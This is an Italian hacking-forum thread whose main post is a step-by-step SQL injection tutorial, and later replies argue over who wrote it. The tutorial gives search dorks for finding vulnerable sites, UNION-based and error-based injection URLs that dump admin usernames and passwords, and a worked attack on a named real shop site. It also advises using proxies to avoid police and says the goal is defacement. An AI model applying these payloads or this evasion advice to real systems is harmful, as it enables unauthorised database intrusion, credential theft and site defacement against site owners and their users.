1. #1
    www.lnf.infn.it
     
    L'avatar di d3vil401
    Msg
    2,270
    Rep
    73
    Mi Piace (♥)
    1070
    Autore del Topic

    Blind Structured Query Lenguage Injection MySQL 4.x/5.x + BSQLi nelle pagine .aspx

    > Introduction post
    Written by devil401 25/06/2010 17.54(Start)-18.12(Stop) Copyright devil401 2009-2010


    né io né il forum ci prendiamo responsabilità,questa guida è stata creata per solo scopo informativo.

    QUESTA GUIDA NON DEVE USCIRE DA QUESTO FORUM SENZA CHE VOI METTIATE I CREDITI,OVVERO SE DOVETE DIFFONDERE QUESTA GUIDA DOVETE AGGIUNGERE ALLA FINE "Guida scritta da devil401 su italiancheats.com".CHIUNQUE VERRà SORPRESO AD AVER COPIATO LA MIA GUIDA E DIFFUSA SU INTERNET SARà PENALMENTE PERSEGUIBILE.

    Avete letto bene cosa ho scritto?xk se vi trovo con la MIA guida senza i MIEI crediti e del FORUM ITALIANCHEATS vi spezzo in 2.

    Questa guida verrà suddivisa nei seguenti capitoli,ogni capitolo avrà un post(anche sub-capitolo):

    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    :Cos'è l'SQL Injection
    ::Come funziona esattamente
    :::Come trovare un sito vulnerabile
    ::::Usare la rispettiva protezione(proxy)
    1. Cos'è un proxy
    2. Come funziona un proxy
    3. Tipi di proxy
    :::::Come procedere con l'SQL Injection:
    1. Trovare il numero delle colonne
    2. Trovare la colonna vulnerabile e la versione del DB
    3. Problemi nella rivelazione della versione del DB
    4. Versione del database(int. ::::::,::::::)
    :::::ersione del database 5.x.x.x
    1. La versione 5.x.x.x del DB
    2. Procedimenti - Ottenere le colonne
    3. Procedimenti - Ottenere le colonne dalle tavole
    4. Procedimenti - Finalizzazione
    ::::::ersione del database 4.x.x.x
    1. La versione 4.x.x.x del DB
    2. Procedimenti - Ottenere le colonne
    3. Procedimenti - Ottenere le colonne dalle tavole
    4. Procedimenti - Finalizzazione
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Man mano che ho tempo scrivo 1 capitolo e ve lo posto,quando avrete problemi con l'SQL Injection o non capite qualcosa:
    se non ho finito di scrivere la guida,allora,scrivete un PM,altrimenti,quando ho finito la guida potete scrivere dei post,questo è per evitare il disordine dei post e dei capitoli,i capitoli devono essere l'uno in fila all'altro


    NON FACCIO LEZIONI PRIVATE E NON STATE A PREGARMI "ti prego,insegnami..." "ti prego hackami..." FATE DA SOLI CON QUESTA GUIDA E IL VOSTRO CERVELLO

    grazie :o

    Written by devil401 25/06/2010 18.14(Start)-18.51(Stop) Copyright devil401 2009-2010

    {POST INFO TERMINATED}


    :Cos'è l'SQL Injection
    1. Come funziona esattamente



    L'SQL Injection è uno dei metodi più usati al mondo in questo periodo dagli hackers per penetrare nel database MySQL {Read about MySQL}.
    Usando gli errori basati sulle queries si possono estrarre le informazioni(Usernames,Passwords,Emails...) da un sito vulnerabile.
    L'insieme delle informazioni si chiama Database.

    Advice:
    Esistono vari programmi programmati dagli artisti dell'SQLi che permettono l'SQLi automatizzata,per esperienza personale vi avverto che essi sono usati per bindare (unire 2 files) i loro virus (specialmente RATs).
    Inoltre,la capacità manuale anche se è un poco più lenta è più agevole in quanto vi permette di trovare colonne e tavole manualmente,ed è anche più emozionante.
    Il problema della lentezza è risolvibile man mano che prenderete esperienza.
    Se ne avete una versione pulita,potreste usarla quando non riuscite proprio a trovare le colonne e le tavole...



    2. Come trovare un sito vulnerabile

    Esistono 2 metodi per trovare siti vulnerabili:
    Dorks & Manual Detection

    Dorks

    I Dorks sono una specie di bugs che servono per trovare un sito vulnerabile specifico,esistono vari programmi per cercarli e vi consiglio di prenderne uno,essi sono importanti per l'SQLi,perché,altrimenti,non trovereste velocemente qualche sito vulnerabile.
    Esempio di un Dork:
    Codice:
    "Index of /admin"
    Essi vengono usati su google,esso,essendo un motore di ricerca,dandogli questi criteri di ricerca,eseguirà uno scan di tutte le pagine internet indicate dal Dork.
    In questo caso vengono cercate tutte le pagine sotto la sezione /admin/.

    Ecco un esempio di Dork hack che ho appena terminato:
    Codice:
    # $FreeBSD: src/etc/group,v 1.19 1999/08/27 23:23:41 peter Exp $
    #
    **********
    daemon:*:1:daemon
    **********
    è la lista dei dati di accesso al server tramite FTP.
    Facile no?
    Ma per adesso non fate niente!

    Manual Detection

    per il manual detection è facilissimo!!!

    prendete un URL di un sito che volete SQLi.

    lasua struttura è questa:

    http://wxw.yourwebsite.com/newreply....reply&p=121607

    allora mettete ' alla fine:

    http://wxw.yourwebsite.com/newreply....reply&p=121607'

    e caricate la pagina,se mancano scripts,immagini,testo ec... o viene visualizzato un errore SQL (Tipico errore è il fetch_array) allora è vulnerabile

    Esempio:

    Codice:
    SQL 无效: SELECT * FROM sa_article WHERE articleid = ''2524'
    Mysql error description: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '2524'' at line 1 
    Mysql error number: 1064 
    Date: 2010-06-25 @ 23:53 
    Script: http://*CENSURED*/article.php?id='2524 
    Referer:
    Mi raccomando non fate ancora niente!



    Se non ci avete capito niente perché sono io che ho scritto male,avvertitemi,cercherò di correggere qualcosa.
    Se non ci avete capito niente perché siete voi,allora è perché non avete le basi necessarie e lasciate stare questa guida fino a quando non sapete qualcosa che vi faccia capire tutto.

    ATTENZIONE:
    Questo è quello che le persone chiamano hacking.
    è vero e proprio hacking questo,non fatevi ingannare dalle imitazioni,i cheat non ti rendono hacker,piuttosto,lamers.
    è ILLEGALE praticare l'SQLi quindi,se non sapete cosa state facendo,o non volete correre rischi,lasciate stare!

    raccomanda la guida per i 16+


    Dork list(per SQLi):
    Codice:
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:Pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:opinions.php?id=
    inurl:spr.php?id=
    inurl:pages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurl:participant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:prod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurl:person.php?id=
    inurl:productinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurl:profile_view.php?id=
    inurl:category.php?id=
    inurl:publications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurl:prod_info.php?id=
    inurl:shop.php?do=part&id=
    inurl:Productinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurl:product.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurl:produit.php?id=
    inurl:pop.php?id=
    inurl:shopping.php?id=
    inurl:productdetail.php?id=
    inurl:post.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurl:page.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurl:product_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:transcript.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:review.php?id=
    inurl:loadpsb.php?id=
    inurl:ages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurl:opinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurl:offer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    
    inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
    inurl:"id=" & intext:"Warning: mysql_fetch_array()
    inurl:"id=" & intext:"Warning: mysql_num_rows()
    inurl:"id=" & intext:"Warning: session_start()
    inurl:"id=" & intext:"Warning: getimagesize()
    inurl:"id=" & intext:"Warning: is_writable()
    inurl:"id=" & intext:"Warning: getimagesize()
    inurl:"id=" & intext:"Warning: Unknown()
    inurl:"id=" & intext:"Warning: session_start()
    inurl:"id=" & intext:"Warning: mysql_result()
    inurl:"id=" & intext:"Warning: pg_exec()
    inurl:"id=" & intext:"Warning: mysql_result()
    inurl:"id=" & intext:"Warning: mysql_num_rows()
    inurl:"id=" & intext:"Warning: mysql_query()
    inurl:"id=" & intext:"Warning: array_merge()
    inurl:"id=" & intext:"Warning: preg_match()
    inurl:"id=" & intext:"Warning: ilesize()
    inurl:"id=" & intext:"Warning: filesize()
    inurl:"id=" & intext:"Warning: filesize()
    inurl:"id=" & intext:"Warning: require()
    Written by devil401 25/06/2010 Copyright devil401 2009-2010

    {POST INFO TERMINATED}


    ::::Usare la rispettiva protezione(proxy)
    1. Cos'è un proxy
    2. Come funziona un proxy
    3. Tipi di proxy

    Il proxy è un metodo per non farsi mai riconoscere su internet.
    l'IP(Internet Protocol) è una serie di numeri es: 192.168.1.1.1
    che determina nome,cognome,via,CAP,numero di telefono e ZIP dell'utente.
    In poche parole è la carta d'identità su internet.
    Eseguire operazioni illegali,in siti dove registrano le entrate degli IP(tutti) e le loro azioni sul sito permettono di rintracciarvi e mandarvi la polizia per casa.
    Come facciamo a non farci sgamare?usando un proxy.

    Una connessione normale eseguirebbe questo procedimento per la comunicazione client-server

    client(voi)->server(sito)->client

    tra la comunicazione e il server ci sono altri processi tra cui il ricevimento dei cookie,cache e le tracce dei java script ma per il nostro processo è trascurabile.

    il proxy farà in questo modo

    Client -> proxy -> server -> proxy ->client
    nascondendo il vostro IP o cambiandolo.

    i proxy sono di 2 tipi:
    HTTP proxy(web)(anonimo,trasparente,elite)
    VNC Proxy(all)(anonimo,trasparente,elite)

    l'http proxy è quello che useremo,esso nasconde il vostro IP solo sul web.
    il VNC proxy nasconde il vostro IP in TUTTE le applicazione che avete,sarete una nuova persona in poche parole.

    i gradi anonimo,trasparente,elite sono tipi di proxy che garantiscono un livello di anonimità diversa:
    anonimo - cambia solamente il vostro IP
    trasparente - cambia il vostro IP e cerca di nascondervi con le comunicazioni col server
    elite - siete completamente nascosti,difficilissimo trovarvi nel web,IP totalmente diverso.

    i proxy rallentano la velocità del trasferimento dati (lagg).

    Written by devil401 25/06/2010 Copyright devil401 2009-2010

    :::::Come procedere con l'SQL Injection:
    1. Trovare il numero delle colonne
    2. Trovare la colonna vulnerabile e la versione del DB

    ripeto che chiunque non volesse andare contro la legge o non volesse rischiare niente,oppure non ne capisce niente di queste cose può lasciar perdere,non dovete conoscere l'SQL Injection per forza,sarebbe troppo difficile e rischioso

    ok,rocediamo nell'SQLi

    dopo aver trovato un sito vulnerabile usiamo un proxy prima di tutto,io uso sempre
    QUESTO,veloce,affidabile,ottima qualità e sopratutto gratuito.

    bene,ora che abbiamo il nostro sito vulnerabile con questa struttura:

    wxw.yousite.com/newreply.php?=18'
    o come lo avete

    togliamo ' :
    wxw.yousite.com/newreply.php?=18

    e cominciamo a trovare il numero delle colonne:

    qui usiamo il comando order by,ovvero ordina dalla colonna *numero*

    capirlo è facile:

    wxw.yousite.com/newreply.php?=-18 order by 1 < NO ERRORE
    wxw.yousite.com/newreply.php?=-18 order by 2 < NO ERRORE
    wxw.yousite.com/newreply.php?=-18 order by 3 < NO ERRORE
    wxw.yousite.com/newreply.php?=-18 order by 4 < ERRORE

    eccellente,quindi se alla colonna 4 mi da errore significa che ho 3 colonne

    faccio notare che il numero delle colonne può essere molto alto,facebook ha ben 52 colonne...ve lo dico perché ho provato ad SQLi,infatti ho trovato un URL vulnerabile.

    bene,ora troviamo la/le colonne vulnerabile/i

    possono essere varie colonne vulnerabili,ma non ha importanza.

    scriviamo questo:

    wxw.yousite.com/newreply.php?=-18 union select 1,2,3

    in questo modo selezioniamo le colonne,e ci dirà quali possiamo modificare a nostro piacere

    nella pagina ci indicherà i numeri in questo modo:

    2
    3

    o solo

    2


    esempio pratico:
     


    quindi alla colonna (una delle...)vulnerabile scriveremo,se mi è capitato 2


    wxw.yousite.com/newreply.php?=-18 union select 1,@@version,3

    e quindi otterremo la versione del DB:

     





    EDIT:
    Girovagando su internet specificatamente in alcuni forums italiani,sono rimasto LETTERALMENTE deluso dalla nostra organizzazione riguardo hackers vs lamers,qua praticamente ci sono SOLO lamers(qua,non nel forum,ma in italia) cioè,ho visto che hanno dato il link dell'SQLi prefabbricata per le versioni 5.x.x.x e praticamente nessuno sapeva cosa scriveva,lo faceva e basta modificando solo l'indirizzo del sito.
    Vi dico solo che se non sapete cosa scrivete riskiate,perché non sapete a volte se è legale o no...e quindi non usate un proxy e vi fate sgamare subito!
    Vi prego non fate queste cavolate,xk mi faresti abbastanza skifo...limitatevi a IMPARARE,cosi potete essere fieri di definirvi hackers in campo SQLi!
    il livello "lamer" nel mondo del web underground è il livello più basso che ci sia,è il nome dato per l'umiliazione di colui che usa cose prefabbricate senza sapere nemmeno cosa fa!
    L'SQLi imparata è emozionante,sapere che il webmaster si è accorto della tua presenza nel suo DB MySQL è emozionante,perché lui combatte pe sgamarti nel proxy e tu combatti per sbrigarti a trovare i suoi dati d'accesso prima che ti sgama,per me è emozionante,mi toglie il fiato a farlo.
    Non fate i lamer,fatemi capire che l'italia non è un paese del tutto skifoso...


    Written by devil401 26/06/2010 copyright devil401 2009-2010

    {POST INFO TERMINATED}


    3. Problemi nella rivelazione della versione del DB
    4. Versione del database(int. ::::::,::::::)

    Problemi nella rivelazione della versione del DB

    Se tornate alla pagina d'errore allora significa che il DB è stato maskerato o cryptato,niente paura è facile risolvere questo problema!

    invece di scrivere solo @@version scriveremo

    convert(@@version using latin1)

    wxw.yousite.com/newreply.php?=-18 union select 1,convert(@@version using latin1),3

    se la pagina continua a non farvi vedere la versione del DB significa che è stata cryptata in HEX

    quindi scriveremo unhex(hex(@@version))

    wxw.yousite.com/newreply.php?=-18 union select 1,unhex(hex(@@version)),3

    ora deve darvi per forza la versione del DB,in caso contrario,significa che è stata cryptata in altri modi,ancora da decryptare,quindi passerete al prossimo sito

    Versione del database


    Esistono 2 versioni vulnerabili all'SQLi standard (esiste anche la Blind SQL Injection)

    versione DB 4.x.x.x
    versione DB 5.x.x.x

    Le 2 versioni hanno metodi differenti basati sullo stesso principio.

    Written by devil401 26/06/2010 copyright devil401 2009-2010

    {POST INFO TERMINATED}


    SE VUOI SEGUIRE LA GUIDA ANCHE IN PRATICA USA IL PROXY!

    :::::ersione del database 5.x.x.x
    1. La versione 5.x.x.x del DB
    2. Procedimenti - Ottenere le colonne


    La versione 5.x.x.xdel DB(DataBase) è la più facile da SQLi visto che contiene 2 cose importanti:
    information_schema.tables e information_schema.columns

    sono 2 files che fanno da lista sia per le tavole sia per le colonne,quindi noi dovremo semplicemente accedere ai 2 files,cosa facilissima!

    avendo il seguente link:

    wxw.yousite.com/newreply.php?=-18 union select 1,@@version,3
    e ci compare che la tavola 2 è la versione 5 allora siamo a cavallo

    scriviamo:
    wxw.yousite.com/newreply.php?=-18 union select 1,group_concat(table_name),3 from information_schema.tables

    usiamo il comando group_concat() che estrae e raggiuppa l'oggetto tra le parentesi,ovvero table_name che invece è il nome che rappresenta tutte le tavole presenti.
    Ma questo comando presenterà tutte la tavole,ma non sempre quelle che cerchiamo noi,ovvero quelle dove sono scritti i dati di accesso!(users,admins,admin,customers,customer...)

    quindi filtriamo le tavole per la ricerca di quelle del DB

    wxw.yousite.com/newreply.php?=-18 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

    ecco,in questo modo filtriamo le tavole a quelle contenute SOLO nel database.
    Se le tavole che cerchiamo,ovvero quelle che ho messo tra parentesi prima,non ci sono,allora torniamo a tutte le colonne (wxw.yousite.com/newreply.php?=-18 union select 1,group_concat(table_name),3 from information_schema.tables)


    e troviamole(consiglio sempre di scrivervele).

    Ora dobbiamo estrarre le colonne,quindi usiamo questo metodo uguale alle tavole,ma per le colonne:

    wxw.yousite.com/newreply.php?=-18 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=char(x)

    ottimo,questo metodo è diverso,molti siti per maskerare le colonne dalle tavole encryptano le tavole,noi allora le cerchiamo cryptate,in ASCII

    per cryptare in ASCII andate qui

    quindi prendete la tavola che dovete estrarre (per esempio "admins",se l'avete trovata)

    admins in ASCII è

    ok,quindi dobbiamo eliminare & # e sostiuire ; in ,

    quindi 97,100,109,105,110,115,.
    eliminiamo l'ultima virgola = 97,100,109,105,110,115

    bene,quindi al posto della x mettiamo il codice ASCII(che io per esempio ho usato admins) 97,100,109,105,110,115

    {Guarda la fine della pagina per un tool aggiuntivo}

    quindi il link diventerà:

    wxw.yousite.com/newreply.php?=-18 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=char(97,100,109,105,110,115)

    bene ora estriamo tutte le colonne!!!
    trovate le colonne username,password o qualcosa di simile,all'interno ci sono i dati di accesso,ma prima di sapere come estrarli vi devo dire come mi raccomando usate sempre i proxy

    {ADDITIONAL TOOLS}

    ASCII SQLi Adapter {99,0 Kb}

    Programma creato per me,elimina automaticamente le & # e sostituiscono le ; in , automaticamente



    se lo volete inviatemi un PM con la richiesta e vi do il link per il download

    Written by devil401 26/06/2010 copyright devil401 2009-2010

    {POST INFO TERMINATED}

    USATE UN PROXY

    4. Procedimenti - Finalizzazione


    Ora,la parte finale per estrarre i dati di accesso dalle colonne
    avendo questo link

    wxw.yousite.com/newreply.php?=-18 union select 1,group_concat(column_name),3 from information_schema.tables where table_name=char(ASCIIHASH)

    nota: ASCIIHASH è la tavola cryptata in ASCII


    quindi adesso estriamo le colonne che avete trovato:

    wxw.yousite.com/newreply.php?=-18 union select 1,group_concat(colonna1,0x3a,colonna2),3 from [nome tavola]

    sostitute colonna1 e colonna2 con le colonne che volete estrarre e nome tavola col nome della tavola

    esempio:
    la tavola che avevo trovato era admins,e ho trovato le seguenti colonne:
    name,suername,email,age,username,password

    ottimo,a me interessano i dati di accesso all'admin,e quindi al pannello di controrlo per poi defacciarlo

    quindi username e password:

    wxw.yousite.com/newreply.php?=-18 union select 1,group_concat(username,0x3a,password),3 from admins

    quindi ho estratto i dati di accesso all'admin panel!

    attenzione: la tavola in questo caso non va cryptata in ASCII

    prossimo thread sarà come trovare l'admin page e come decryptare le passwords,al momento dovrete pazientare

    Written by devil401 30/06/2010 copyright devil401 2009-2010

    {POST INFO TERMINATED}

    USATE UN PROXY

    ::::::ersione del database 4.x.x.x
    1. La versione 4.x.x.x del DB
    2. Procedimenti - Ottenere le colonne

    La versione 4 del DB è semplice,ma è più lunga e noiosa,questa volta il information_schema non ci sarà.
    bisognera provare in continuazione tutte le tavole possibili (usate la lista che ho postato tempo fa)
    quindi fate in questo modo:

    wxw.yousite.com/newreply.php?=-18 union select 1,group_concat(column_name),3 from admin < ERRORE

    wxw.yousite.com/newreply.php?=-18 union select 1,group_concat(column_name),3 from admins <ERRORE

    wxw.yousite.com/newreply.php?=-18 union select 1,group_concat(column_name),3 from users < NON ERRORE

    bene,quindi adesso abbiamo le colonne,e quindi procederete allo stesso modo della versione 5 cioè il dump:

    wxw.yousite.com/newreply.php?=-18 union select 1,group_concat(colonna1,0x3a,colonna2),3 from users

    FINE DELLA GUIDA ore 12.43

    ============================================

    Questa volta vi spiego come fare una BSQLi (Blind Structured Query Lenguage Injection)
    in un sito che ha una pagina in estensione .aspx,per esempio utilizzeremo questa pagina vulnerabile qui:

    Codice:
    http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton
    (Ho notato che la pagina non funzione più,ma la vulnerabilità è ancora utilizzabile)

    UTILIZZATE UN PROXY SE VOLETE PROVARE

    VI CONSIGLIO VIVAMENTE DI LEGGERE L'ALTRO TUTORIAL CHE SCRISSI SULLA SQLi PER PRENDERE FAMILIARITà E CONSAPEVOLEZZA IN QUELLO CHE STATE FACENDO

    bene...vediamo di cominciare...
    Codice:
    http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1
    oh no,dice che la pagina non esiste,quindi proviamo tramite questo percorso
    Codice:
    http://pothys.com/ImageDisplay.aspx?Id=1535
    Ma guarda...ecco la vulnerabilità!
    Troviamo le tavole,aggiungendo un termine diverso da quello che usavamo nella BSQLi precedentemente spiegata: having 1=1
    Codice:
    http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1
    LA TERMINOLOGIA QUI CAMBIA COMPLETAMENTE

    vi dovrebbe compatire la lista delle colonne:
    Codice:
    Column 'ProductMaster.price' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    Column 'ProductMaster.ProductId' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    Column 'ProductMaster.MainCategoryId' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    Column 'ProductMaster.SubCategoryId' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    Column 'ProductMaster.productName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    Column 'ProductMaster.ProductDescription' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    Column 'ProductMaster.price' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    Column 'ProductMaster.MaximumStock' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    Column 'ProductMaster.ThumbImage' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    Column 'ProductMaster.MainImage' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    Column 'ProductMaster.LargeImage' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    Column 'ProductMaster.prdindex' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    Column 'ProductMaster.MultiImage' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    queste sono tutte le colonne che abbiamo a disposizione,ma a noi interessa le 2 colonne dove ci sono le informazioni dell'admin :icon9:

    allora troviamo le tavole che abbiamo a disposizione:
    Codice:
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables))
    notate quanto è simile alla BSQLi che avevamo spiegato tempo fa,solo che cambia la terminologia(difficile da ricordare,se non si sa cosa si scrive,ma facile da eseguire)

    quella è la prima tavola del database.ma non è quella dell'admin! :(
    allora cerchiamo la 2^
    Codice:
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder')))
    notate il not in,in questo modo la query indica di darci il nome della prossima tavola CHE NON SI CHIAMA in quel modo,quindi noi avremo il nome della 2^ tavola nel database

    "AdminMaster" eccola!!
    quindi ora estraiamo le colonne all'interno!
    Codice:
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster'))
    nome della prima colonna,ovvero l'username dell'admin

    Codice:
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster' and column_name not in ('Admin_name')))
    nome della seconda colonna,ovvero la psw dell'admin

    Quindi le colonne a nostra dispozione,che ci interessano sono:
    Codice:
    Admin_name
    &
    Admin_password
    allora adesso non ci rimane che estrarre le righe (dati all'interno delle colonne)

    Codice:
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_name from AdminMaster))
    questo è il nome: admin
    Codice:
    http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_password from AdminMaster))
    e questa è la password...

    Fine

    Tutorial scritto da d3v1l401(devil401) e la parte su ASPi shyamraj
    copyright devil401 2009-2010
    non copiare questa guida senza scrivere i crediti,altrimenti non posto + queste guide


    Le scrissi io tempo fa su IC
    non copiatele senza scrivere i crediti ovvero:
    l'autore e il sito a cui è stato dedicato (italiancheats.com)
    mi dispiace per i links esterni ma cosi ho stabilito nelle condizioni.

    I vari tools di mia creazione sono andati persi

    Forse qualcosa l'ho sbagliata ( sicuramente nella parte teorica ),in tal caso correggetemi
    Ultima modifica di d3vil401; 1/08/11 alle 12:31
    d3vsite

    Citazione Originariamente Scritto da jihed hacker Visualizza Messaggio
    jay io avrei voglia di creare un trainer in C++ MA CON IL SUSPENDER POTREI USARE CHEAT ENGINE PER TROVARE I VALUE E I PHP CODE


  2.  

  3. #2
    Utente IF
     
    L'avatar di Razor4x 7777
    Msg
    316
    Rep
    6
    Mi Piace (♥)
    16

    asp injection crediti by shyamraj dell'hackforums e non di d3v1l401 http://www.hackforums.net/archive/in...-729076-1.html


  4. #3
    www.lnf.infn.it
     
    L'avatar di d3vil401
    Msg
    2,270
    Rep
    73
    Mi Piace (♥)
    1070
    Autore del Topic

    Citazione Originariamente Scritto da Razor4x 7777 Visualizza Messaggio
    asp injection crediti by shyamraj dell'hackforums e non di d3v1l401 http://www.hackforums.net/archive/in...-729076-1.html
    gia gli chiesi l'ordine a shy,la guida risale a oltre 1 anno fa...
    d3vsite

    Citazione Originariamente Scritto da jihed hacker Visualizza Messaggio
    jay io avrei voglia di creare un trainer in C++ MA CON IL SUSPENDER POTREI USARE CHEAT ENGINE PER TROVARE I VALUE E I PHP CODE


  5. #4
    Utente IF
     
    L'avatar di Razor4x 7777
    Msg
    316
    Rep
    6
    Mi Piace (♥)
    16

    dubito che gli chiesi qualcosa.. comunque la guida è sua e non l'hai fatta tu quindi i crediti non sono tuoi . il fatto dell'anno non so cosa centri.


  6. #5
    Producer Music
     
    L'avatar di Carbo Bass
    Msg
    2,707
    Rep
    84
    Mi Piace (♥)
    227

    "CHIUNQUE VERRà SORPRESO AD AVER COPIATO LA MIA GUIDA E DIFFUSA SU INTERNET SARà PENALMENTE PERSEGUIBILE"


    Penalmente perseguibile? Ma non spariamo boiate,perfavore.
    Follow me on TPB !
    Richiedi il tuo Torrent !

  7. #6
    www.lnf.infn.it
     
    L'avatar di d3vil401
    Msg
    2,270
    Rep
    73
    Mi Piace (♥)
    1070
    Autore del Topic

    Citazione Originariamente Scritto da Carbo Bass Visualizza Messaggio
    "CHIUNQUE VERRà SORPRESO AD AVER COPIATO LA MIA GUIDA E DIFFUSA SU INTERNET SARà PENALMENTE PERSEGUIBILE"


    Penalmente perseguibile? Ma non spariamo boiate,perfavore.
    Hai letto quanti anni fa? Lo sai quanti anni avevo?
    Dio mio...
    d3vsite

    Citazione Originariamente Scritto da jihed hacker Visualizza Messaggio
    jay io avrei voglia di creare un trainer in C++ MA CON IL SUSPENDER POTREI USARE CHEAT ENGINE PER TROVARE I VALUE E I PHP CODE


  8. #7
    BatCaaaaaaaaatNanana
     
    L'avatar di Never Mind
    Msg
    5,507
    Rep
    148
    Mi Piace (♥)
    2375

    Citazione Originariamente Scritto da d3v1l401 Visualizza Messaggio
    Hai letto quanti anni fa? Lo sai quanti anni avevo?
    Dio mio...
    Il commento è di 2 anni fa.
    il rasoio fa male, il fiume è troppo basso, l’acido è bestiale, la droga dà il collasso, la corda si spezza, la pistola è proibita, il gas puzza, allora
    il rasoio fa male, il fiume è troppo basso, l’acido è bestiale, la droga dà il collasso, la corda si spezza, la pistola è proibita, il gas puzza, allora; viva la vita.

  9. #8
    www.lnf.infn.it
     
    L'avatar di d3vil401
    Msg
    2,270
    Rep
    73
    Mi Piace (♥)
    1070
    Autore del Topic

    Citazione Originariamente Scritto da Shi. Visualizza Messaggio
    Il commento è di 2 anni fa.
    Si infatti, me ne sono accorto un pochino tardi...eheh!
    d3vsite

    Citazione Originariamente Scritto da jihed hacker Visualizza Messaggio
    jay io avrei voglia di creare un trainer in C++ MA CON IL SUSPENDER POTREI USARE CHEAT ENGINE PER TROVARE I VALUE E I PHP CODE


